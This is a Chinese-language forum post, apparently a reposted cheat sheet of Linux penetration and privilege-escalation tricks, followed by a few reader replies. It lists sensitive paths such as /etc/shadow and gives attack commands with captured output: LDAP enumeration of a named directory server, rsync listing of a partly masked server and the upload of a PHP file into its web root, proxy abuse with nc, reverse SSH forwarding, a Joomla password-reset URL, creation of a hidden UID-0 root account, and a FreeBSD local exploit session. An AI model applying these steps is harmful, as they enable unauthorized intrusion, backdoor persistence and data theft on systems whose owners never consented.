Linux渗透与提权：技巧总结篇

Jumbo

本文为Linux渗透与提权技巧总结篇，旨在收集各种Linux渗透技巧与提权版本，方便各位同学在日后的渗透测试中能够事半功倍。

Linux 系统下的一些常见路径：

1. /etc/passwd
   
2. 
   
3. /etc/shadow
   
4. 
   
5. /etc/fstab
   
6. 
   
7. /etc/host.conf
   
8. 
   
9. /etc/motd
   
10. 
    
11. /etc/ld.so.conf
    
12. 
    
13. /var/www/htdocs/index.php
    
14. 
    
15. /var/www/conf/httpd.conf
    
16. 
    
17. /var/www/htdocs/index.html
    
18. 
    
19. /var/httpd/conf/php.ini
    
20. 
    
21. /var/httpd/htdocs/index.php
    
22. 
    
23. /var/httpd/conf/httpd.conf
    
24. 
    
25. /var/httpd/htdocs/index.html
    
26. 
    
27. /var/httpd/conf/php.ini
    
28. 
    
29. /var/www/index.html
    
30. 
    
31. /var/www/index.php
    
32. 
    
33. /opt/www/conf/httpd.conf
    
34. 
    
35. /opt/www/htdocs/index.php
    
36. 
    
37. /opt/www/htdocs/index.html
    
38. 
    
39. /usr/local/apache/htdocs/index.html
    
40. 
    
41. /usr/local/apache/htdocs/index.php
    
42. 
    
43. /usr/local/apache2/htdocs/index.html
    
44. 
    
45. /usr/local/apache2/htdocs/index.php
    
46. 
    
47. /usr/local/httpd2.2/htdocs/index.php
    
48. 
    
49. /usr/local/httpd2.2/htdocs/index.html
    
50. 
    
51. /tmp/apache/htdocs/index.html
    
52. 
    
53. /tmp/apache/htdocs/index.php
    
54. 
    
55. /etc/httpd/htdocs/index.php
    
56. 
    
57. /etc/httpd/conf/httpd.conf
    
58. 
    
59. /etc/httpd/htdocs/index.html
    
60. 
    
61. /www/php/php.ini
    
62. 
    
63. /www/php4/php.ini
    
64. 
    
65. /www/php5/php.ini
    
66. 
    
67. /www/conf/httpd.conf
    
68. 
    
69. /www/htdocs/index.php
    
70. 
    
71. /www/htdocs/index.html
    
72. 
    
73. /usr/local/httpd/conf/httpd.conf
    
74. 
    
75. /apache/apache/conf/httpd.conf
    
76. 
    
77. /apache/apache2/conf/httpd.conf
    
78. 
    
79. /etc/apache/apache.conf
    
80. 
    
81. /etc/apache2/apache.conf
    
82. 
    
83. /etc/apache/httpd.conf
    
84. 
    
85. /etc/apache2/httpd.conf
    
86. 
    
87. /etc/apache2/vhosts.d/00_default_vhost.conf
    
88. 
    
89. /etc/apache2/sites-available/default
    
90. 
    
91. /etc/phpmyadmin/config.inc.php
    
92. 
    
93. /etc/mysql/my.cnf
    
94. 
    
95. /etc/httpd/conf.d/php.conf
    
96. 
    
97. /etc/httpd/conf.d/httpd.conf
    
98. 
    
99. /etc/httpd/logs/error_log
    
100. 
     
101. /etc/httpd/logs/error.log
     
102. 
     
103. /etc/httpd/logs/access_log
     
104. 
     
105. /etc/httpd/logs/access.log
     
106. 
     
107. /home/apache/conf/httpd.conf
     
108. 
     
109. /home/apache2/conf/httpd.conf
     
110. 
     
111. /var/log/apache/error_log
     
112. 
     
113. /var/log/apache/error.log
     
114. 
     
115. /var/log/apache/access_log
     
116. 
     
117. /var/log/apache/access.log
     
118. 
     
119. /var/log/apache2/error_log
     
120. 
     
121. /var/log/apache2/error.log
     
122. 
     
123. /var/log/apache2/access_log
     
124. 
     
125. /var/log/apache2/access.log
     
126. 
     
127. /var/www/logs/error_log
     
128. 
     
129. /var/www/logs/error.log
     
130. 
     
131. /var/www/logs/access_log
     
132. 
     
133. /var/www/logs/access.log
     
134. 
     
135. /usr/local/apache/logs/error_log
     
136. 
     
137. /usr/local/apache/logs/error.log
     
138. 
     
139. /usr/local/apache/logs/access_log
     
140. 
     
141. /usr/local/apache/logs/access.log
     
142. 
     
143. /var/log/error_log
     
144. 
     
145. /var/log/error.log
     
146. 
     
147. /var/log/access_log
     
148. 
     
149. /var/log/access.log
     
150. 
     
151. /usr/local/apache/logs/access_logaccess_log.old
     
152. 
     
153. /usr/local/apache/logs/error_logerror_log.old
     
154. 
     
155. /etc/php.ini
     
156. 
     
157. /bin/php.ini
     
158. 
     
159. /etc/init.d/httpd
     
160. 
     
161. /etc/init.d/mysql
     
162. 
     
163. /etc/httpd/php.ini
     
164. 
     
165. /usr/lib/php.ini
     
166. 
     
167. /usr/lib/php/php.ini
     
168. 
     
169. /usr/local/etc/php.ini
     
170. 
     
171. /usr/local/lib/php.ini
     
172. 
     
173. /usr/local/php/lib/php.ini
     
174. 
     
175. /usr/local/php4/lib/php.ini
     
176. 
     
177. /usr/local/php4/php.ini
     
178. 
     
179. /usr/local/php4/lib/php.ini
     
180. 
     
181. /usr/local/php5/lib/php.ini
     
182. 
     
183. /usr/local/php5/etc/php.ini
     
184. 
     
185. /usr/local/php5/php5.ini
     
186. 
     
187. /usr/local/apache/conf/php.ini
     
188. 
     
189. /usr/local/apache/conf/httpd.conf
     
190. 
     
191. /usr/local/apache2/conf/httpd.conf
     
192. 
     
193. /usr/local/apache2/conf/php.ini
     
194. 
     
195. /etc/php4.4/fcgi/php.ini
     
196. 
     
197. /etc/php4/apache/php.ini
     
198. 
     
199. /etc/php4/apache2/php.ini
     
200. 
     
201. /etc/php5/apache/php.ini
     
202. 
     
203. /etc/php5/apache2/php.ini
     
204. 
     
205. /etc/php/php.ini
     
206. 
     
207. /etc/php/php4/php.ini
     
208. 
     
209. /etc/php/apache/php.ini
     
210. 
     
211. /etc/php/apache2/php.ini
     
212. 
     
213. /web/conf/php.ini
     
214. 
     
215. /usr/local/Zend/etc/php.ini
     
216. 
     
217. /opt/xampp/etc/php.ini
     
218. 
     
219. /var/local/www/conf/php.ini
     
220. 
     
221. /var/local/www/conf/httpd.conf
     
222. 
     
223. /etc/php/cgi/php.ini
     
224. 
     
225. /etc/php4/cgi/php.ini
     
226. 
     
227. /etc/php5/cgi/php.ini
     
228. 
     
229. /php5/php.ini
     
230. 
     
231. /php4/php.ini
     
232. 
     
233. /php/php.ini
     
234. 
     
235. /PHP/php.ini
     
236. 
     
237. /apache/php/php.ini
     
238. 
     
239. /xampp/apache/bin/php.ini
     
240. 
     
241. /xampp/apache/conf/httpd.conf
     
242. 
     
243. /NetServer/bin/stable/apache/php.ini
     
244. 
     
245. /home2/bin/stable/apache/php.ini
     
246. 
     
247. /home/bin/stable/apache/php.ini
     
248. 
     
249. /var/log/mysql/mysql-bin.log
     
250. 
     
251. /var/log/mysql.log
     
252. 
     
253. /var/log/mysqlderror.log
     
254. 
     
255. /var/log/mysql/mysql.log
     
256. 
     
257. /var/log/mysql/mysql-slow.log
     
258. 
     
259. /var/mysql.log
     
260. 
     
261. /var/lib/mysql/my.cnf
     
262. 
     
263. /usr/local/mysql/my.cnf
     
264. 
     
265. /usr/local/mysql/bin/mysql
     
266. 
     
267. /etc/mysql/my.cnf
     
268. 
     
269. /etc/my.cnf
     
270. 
     
271. /usr/local/cpanel/logs
     
272. 
     
273. /usr/local/cpanel/logs/stats_log
     
274. 
     
275. /usr/local/cpanel/logs/access_log
     
276. 
     
277. /usr/local/cpanel/logs/error_log
     
278. 
     
279. /usr/local/cpanel/logs/license_log
     
280. 
     
281. /usr/local/cpanel/logs/login_log
     
282. 
     
283. /usr/local/cpanel/logs/stats_log
     
284. 
     
285. /usr/local/share/examples/php4/php.ini
     
286. 
     
287. /usr/local/share/examples/php/php.ini
     
288. 
     
289. /usr/local/tomcat5527/bin/version.sh
     
290. 
     
291. /usr/share/tomcat6/bin/startup.sh
     
292. 
     
293. /usr/tomcat6/bin/startup.sh

复制代码

liunx 相关提权渗透技巧总结，一、ldap 渗透技巧：

1.cat /etc/nsswitch

看看密码登录策略我们可以看到使用了file ldap模式
2.less /etc/ldap.conf

base ou=People,dc=unix-center,dc=net

找到ou,dc,dc设置

3.查找管理员信息

匿名方式

  ldapsearch -x -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2

有密码形式
  ldapsearch -x -W -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2

4.查找10条用户记录
  ldapsearch -h 192.168.2.2 -x -z 10 -p 指定端口

实战:

1.cat /etc/nsswitch

看看密码登录策略我们可以看到使用了file ldap模式
  2.less /etc/ldap.conf
base ou=People,dc=unix-center,dc=net

找到ou,dc,dc设置

3.查找管理员信息

匿名方式
  ldapsearch -x -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2

有密码形式
ldapsearch -x -W -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2

4.查找10条用户记录
  ldapsearch -h 192.168.2.2 -x -z 10 -p 指定端口

渗透实战:

1.返回所有的属性

1. ldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s sub "objectclass=*"
   
2. 
   
3. version: 1
   
4. 
   
5. dn: dc=ruc,dc=edu,dc=cn
   
6. 
   
7. dc: ruc
   
8. 
   
9. objectClass: domain
   
10. 
    
11. dn: uid=manager,dc=ruc,dc=edu,dc=cn
    
12. 
    
13. uid: manager
    
14. 
    
15. objectClass: inetOrgPerson
    
16. 
    
17. objectClass: organizationalPerson
    
18. 
    
19. objectClass: person
    
20. 
    
21. objectClass: top
    
22. 
    
23. sn: manager
    
24. 
    
25. cn: manager
    
26. 
    
27. dn: uid=superadmin,dc=ruc,dc=edu,dc=cn
    
28. 
    
29. uid: superadmin
    
30. 
    
31. objectClass: inetOrgPerson
    
32. 
    
33. objectClass: organizationalPerson
    
34. 
    
35. objectClass: person
    
36. 
    
37. objectClass: top
    
38. 
    
39. sn: superadmin
    
40. 
    
41. cn: superadmin
    
42. 
    
43. dn: uid=admin,dc=ruc,dc=edu,dc=cn
    
44. 
    
45. uid: admin
    
46. 
    
47. objectClass: inetOrgPerson
    
48. 
    
49. objectClass: organizationalPerson
    
50. 
    
51. objectClass: person
    
52. 
    
53. objectClass: top
    
54. 
    
55. sn: admin
    
56. 
    
57. cn: admin
    
58. 
    
59. dn: uid=dcp_anonymous,dc=ruc,dc=edu,dc=cn
    
60. 
    
61. uid: dcp_anonymous
    
62. 
    
63. objectClass: top
    
64. 
    
65. objectClass: person
    
66. 
    
67. objectClass: organizationalPerson
    
68. 
    
69. objectClass: inetOrgPerson
    
70. 
    
71. sn: dcp_anonymous
    
72. 
    
73. cn: dcp_anonymous
    

复制代码

2.查看基类
bash-3.00# ldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s base "objectclass=*" | more version: 1 dn: dc=ruc,dc=edu,dc=cn dc: ruc objectClass: domain

3.查找

1. bash-3.00# ldapsearch -h 192.168.7.33 -b "" -s base "objectclass=*"
   
2. 
   
3. version: 1
   
4. 
   
5. dn:
   
6. 
   
7. objectClass: top
   
8. 
   
9. namingContexts: dc=ruc,dc=edu,dc=cn
   
10. 
    
11. supportedExtension: 2.16.840.1.113730.3.5.7
    
12. 
    
13. supportedExtension: 2.16.840.1.113730.3.5.8
    
14. 
    
15. supportedExtension: 1.3.6.1.4.1.4203.1.11.1
    
16. 
    
17. supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.25
    
18. 
    
19. supportedExtension: 2.16.840.1.113730.3.5.3
    
20. 
    
21. supportedExtension: 2.16.840.1.113730.3.5.5
    
22. 
    
23. supportedExtension: 2.16.840.1.113730.3.5.6
    
24. 
    
25. supportedExtension: 2.16.840.1.113730.3.5.4
    
26. 
    
27. supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.1
    
28. 
    
29. supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.2
    
30. 
    
31. supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.3
    
32. 
    
33. supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.4
    
34. 
    
35. supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.5
    
36. 
    
37. supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.6
    
38. 
    
39. supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.7
    
40. 
    
41. supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.8
    
42. 
    
43. supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.9
    
44. 
    
45. supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.23
    
46. 
    
47. supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.11
    
48. 
    
49. supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.12
    
50. 
    
51. supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.13
    
52. 
    
53. supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.14
    
54. 
    
55. supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.15
    
56. 
    
57. supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.16
    
58. 
    
59. supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.17
    
60. 
    
61. supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.18
    
62. 
    
63. supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.19
    
64. 
    
65. supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.21
    
66. 
    
67. supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.22
    
68. 
    
69. supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.24
    
70. 
    
71. supportedExtension: 1.3.6.1.4.1.1466.20037
    
72. 
    
73. supportedExtension: 1.3.6.1.4.1.4203.1.11.3
    
74. 
    
75. supportedControl: 2.16.840.1.113730.3.4.2
    
76. 
    
77. supportedControl: 2.16.840.1.113730.3.4.3
    
78. 
    
79. supportedControl: 2.16.840.1.113730.3.4.4
    
80. 
    
81. supportedControl: 2.16.840.1.113730.3.4.5
    
82. 
    
83. supportedControl: 1.2.840.113556.1.4.473
    
84. 
    
85. supportedControl: 2.16.840.1.113730.3.4.9
    
86. 
    
87. supportedControl: 2.16.840.1.113730.3.4.16
    
88. 
    
89. supportedControl: 2.16.840.1.113730.3.4.15
    
90. 
    
91. supportedControl: 2.16.840.1.113730.3.4.17
    
92. 
    
93. supportedControl: 2.16.840.1.113730.3.4.19
    
94. 
    
95. supportedControl: 1.3.6.1.4.1.42.2.27.9.5.2
    
96. 
    
97. supportedControl: 1.3.6.1.4.1.42.2.27.9.5.6
    
98. 
    
99. supportedControl: 1.3.6.1.4.1.42.2.27.9.5.8
    
100. 
     
101. supportedControl: 1.3.6.1.4.1.42.2.27.8.5.1
     
102. 
     
103. supportedControl: 1.3.6.1.4.1.42.2.27.8.5.1
     
104. 
     
105. supportedControl: 2.16.840.1.113730.3.4.14
     
106. 
     
107. supportedControl: 1.3.6.1.4.1.1466.29539.12
     
108. 
     
109. supportedControl: 2.16.840.1.113730.3.4.12
     
110. 
     
111. supportedControl: 2.16.840.1.113730.3.4.18
     
112. 
     
113. supportedControl: 2.16.840.1.113730.3.4.13
     
114. 
     
115. supportedSASLMechanisms: EXTERNAL
     
116. 
     
117. supportedSASLMechanisms: DIGEST-MD5
     
118. 
     
119. supportedLDAPVersion: 2
     
120. 
     
121. supportedLDAPVersion: 3
     
122. 
     
123. vendorName: Sun Microsystems, Inc.
     
124. 
     
125. vendorVersion: Sun-Java(tm)-System-Directory/6.2
     
126. 
     
127. dataversion: 020090516011411
     
128. 
     
129. netscapemdsuffix: cn=ldap://dc=webA:389
     
130. 
     
131. supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA
     
132. 
     
133. supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
     
134. 
     
135. supportedSSLCiphers: TLS_DHE_RSA_WITH_AES_256_CBC_SHA
     
136. 
     
137. supportedSSLCiphers: TLS_DHE_DSS_WITH_AES_256_CBC_SHA
     
138. 
     
139. supportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_256_CBC_SHA
     
140. 
     
141. supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA
     
142. 
     
143. supportedSSLCiphers: TLS_RSA_WITH_AES_256_CBC_SHA
     
144. 
     
145. supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_RC4_128_SHA
     
146. 
     
147. supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA
     
148. 
     
149. supportedSSLCiphers: TLS_ECDHE_RSA_WITH_RC4_128_SHA
     
150. 
     
151. supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
     
152. 
     
153. supportedSSLCiphers: TLS_DHE_DSS_WITH_RC4_128_SHA
     
154. 
     
155. supportedSSLCiphers: TLS_DHE_RSA_WITH_AES_128_CBC_SHA
     
156. 
     
157. supportedSSLCiphers: TLS_DHE_DSS_WITH_AES_128_CBC_SHA
     
158. 
     
159. supportedSSLCiphers: TLS_ECDH_RSA_WITH_RC4_128_SHA
     
160. 
     
161. supportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_128_CBC_SHA
     
162. 
     
163. supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_RC4_128_SHA
     
164. 
     
165. supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA
     
166. 
     
167. supportedSSLCiphers: SSL_RSA_WITH_RC4_128_MD5
     
168. 
     
169. supportedSSLCiphers: SSL_RSA_WITH_RC4_128_SHA
     
170. 
     
171. supportedSSLCiphers: TLS_RSA_WITH_AES_128_CBC_SHA
     
172. 
     
173. supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA
     
174. 
     
175. supportedSSLCiphers: TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA
     
176. 
     
177. supportedSSLCiphers: SSL_DHE_RSA_WITH_3DES_EDE_CBC_SHA
     
178. 
     
179. supportedSSLCiphers: SSL_DHE_DSS_WITH_3DES_EDE_CBC_SHA
     
180. 
     
181. supportedSSLCiphers: TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA
     
182. 
     
183. supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA
     
184. 
     
185. supportedSSLCiphers: SSL_RSA_FIPS_WITH_3DES_EDE_CBC_SHA
     
186. 
     
187. supportedSSLCiphers: SSL_RSA_WITH_3DES_EDE_CBC_SHA
     
188. 
     
189. supportedSSLCiphers: SSL_DHE_RSA_WITH_DES_CBC_SHA
     
190. 
     
191. supportedSSLCiphers: SSL_DHE_DSS_WITH_DES_CBC_SHA
     
192. 
     
193. supportedSSLCiphers: SSL_RSA_FIPS_WITH_DES_CBC_SHA
     
194. 
     
195. supportedSSLCiphers: SSL_RSA_WITH_DES_CBC_SHA
     
196. 
     
197. supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_RC4_56_SHA
     
198. 
     
199. supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_DES_CBC_SHA
     
200. 
     
201. supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC4_40_MD5
     
202. 
     
203. supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC2_CBC_40_MD5
     
204. 
     
205. supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_NULL_SHA
     
206. 
     
207. supportedSSLCiphers: TLS_ECDHE_RSA_WITH_NULL_SHA
     
208. 
     
209. supportedSSLCiphers: TLS_ECDH_RSA_WITH_NULL_SHA
     
210. 
     
211. supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_NULL_SHA
     
212. 
     
213. supportedSSLCiphers: SSL_RSA_WITH_NULL_SHA
     
214. 
     
215. supportedSSLCiphers: SSL_RSA_WITH_NULL_MD5
     
216. 
     
217. supportedSSLCiphers: SSL_CK_RC4_128_WITH_MD5
     
218. 
     
219. supportedSSLCiphers: SSL_CK_RC2_128_CBC_WITH_MD5
     
220. 
     
221. supportedSSLCiphers: SSL_CK_DES_192_EDE3_CBC_WITH_MD5
     
222. 
     
223. supportedSSLCiphers: SSL_CK_DES_64_CBC_WITH_MD5
     
224. 
     
225. supportedSSLCiphers: SSL_CK_RC4_128_EXPORT40_WITH_MD5
     
226. 
     
227. supportedSSLCiphers: SSL_CK_RC2_128_CBC_EXPORT40_WITH_MD5
     

复制代码

liunx 相关提权渗透技巧总结，二、NFS 渗透技巧：

列举IP：

showmount -e ip

liunx 相关提权渗透技巧总结，三、rsync渗透技巧：

1.查看rsync服务器上的列表：

1. rsync 210.51.X.X::
   
2. 
   
3. finance
   
4. 
   
5. img_finance
   
6. 
   
7. auto
   
8. 
   
9. img_auto
   
10. 
    
11. html_cms
    
12. 
    
13. img_cms
    
14. 
    
15. ent_cms
    
16. 
    
17. ent_img
    
18. 
    
19. ceshi
    
20. 
    
21. res_img
    
22. 
    
23. res_img_c2
    
24. 
    
25. chip
    
26. 
    
27. chip_c2
    
28. 
    
29. ent_icms
    
30. 
    
31. games
    
32. 
    
33. gamesimg
    
34. 
    
35. media
    
36. 
    
37. mediaimg
    
38. 
    
39. fashion
    
40. 
    
41. res-fashion
    
42. 
    
43. res-fo
    
44. 
    
45. taobao-home
    
46. 
    
47. res-taobao-home
    
48. 
    
49. house
    
50. 
    
51. res-house
    
52. 
    
53. res-home
    
54. 
    
55. res-edu
    
56. 
    
57. res-ent
    
58. 
    
59. res-labs
    
60. 
    
61. res-news
    
62. 
    
63. res-phtv
    
64. 
    
65. res-media
    
66. 
    
67. home
    
68. 
    
69. edu
    
70. 
    
71. news
    
72. 
    
73. res-book
    

复制代码

看相应的下级目录(注意一定要在目录后面添加上/)

1. rsync 210.51.X.X::htdocs_app/
   
2. 
   
3. rsync 210.51.X.X::auto/
   
4. 
   
5. rsync 210.51.X.X::edu/
   

复制代码

2.下载rsync服务器上的配置文件
  rsync -avz 210.51.X.X::htdocs_app/ /tmp/app/

3.向上更新rsync文件(成功上传,不会覆盖)

rsync -avz nothack.php 210.51.X.X::htdocs_app/warn/

  http://app.finance.xxx.com/warn/nothack.txt

liunx 相关提权渗透技巧总结，四、squid渗透技巧：

  nc -vv 91ri.org 80
GET HTTP://www.sina.com / HTTP/1.0
  GET HTTP://WWW.sina.com:22 / HTTP/1.0

liunx 相关提权渗透技巧总结，五、SSH端口转发：

  ssh -C -f -N -g -R 44:127.0.0.1:22 cnbird@ip

liunx 相关提权渗透技巧总结，六、joomla渗透小技巧：

确定版本：

  index.php?option=com_content&view=article&id=30:what-languages-are-supported-by-joomla-15&catid=32:languages&Itemid=47

重新设置密码：
index.php?option=com_user&view=reset&layout=confirm

liunx 相关提权渗透技巧总结，七、Linux添加UID为0的root用户：
  useradd -o -u 0 nothack

liunx 相关提权渗透技巧总结，八、freebsd本地提权：

1. [argp@julius ~]$ uname -rsi
   
2. 
   
3. * freebsd 7.3-RELEASE GENERIC
   
4. 
   
5. * [argp@julius ~]$ sysctl vfs.usermount
   
6. 
   
7. * vfs.usermount: 1
   
8. 
   
9. * [argp@julius ~]$ id
   
10. 
    
11. * uid=1001(argp) gid=1001(argp) groups=1001(argp)
    
12. 
    
13. * [argp@julius ~]$ gcc -Wall nfs_mount_ex.c -o nfs_mount_ex
    
14. 
    
15. * [argp@julius ~]$ ./nfs_mount_ex
    
16. 
    
17. *
    
18. 
    
19. calling nmount()
    

复制代码

tar 文件夹打包：

1、tar打包：

  tar -cvf /home/public_html/*.tar /home/public_html/--exclude=排除文件*.gif  排除目录 /xx/xx/*

alzip打包(韩国) alzip -a D:\WEB d:\web*.rar

{

注：

关于tar的打包方式,linux不以扩展名来决定文件类型。

若压缩的话tar -ztf *.tar.gz   查看压缩包里内容     tar -zxf *.tar.gz 解压

那么用这条比较好

  tar -czf /home/public_html/*.tar.gz /home/public_html/--exclude= 排除文件*.gif   排除目录 /xx/xx/*

}

谢谢楼主，共同发展

这是什么东东啊

不错，骚年。顶一个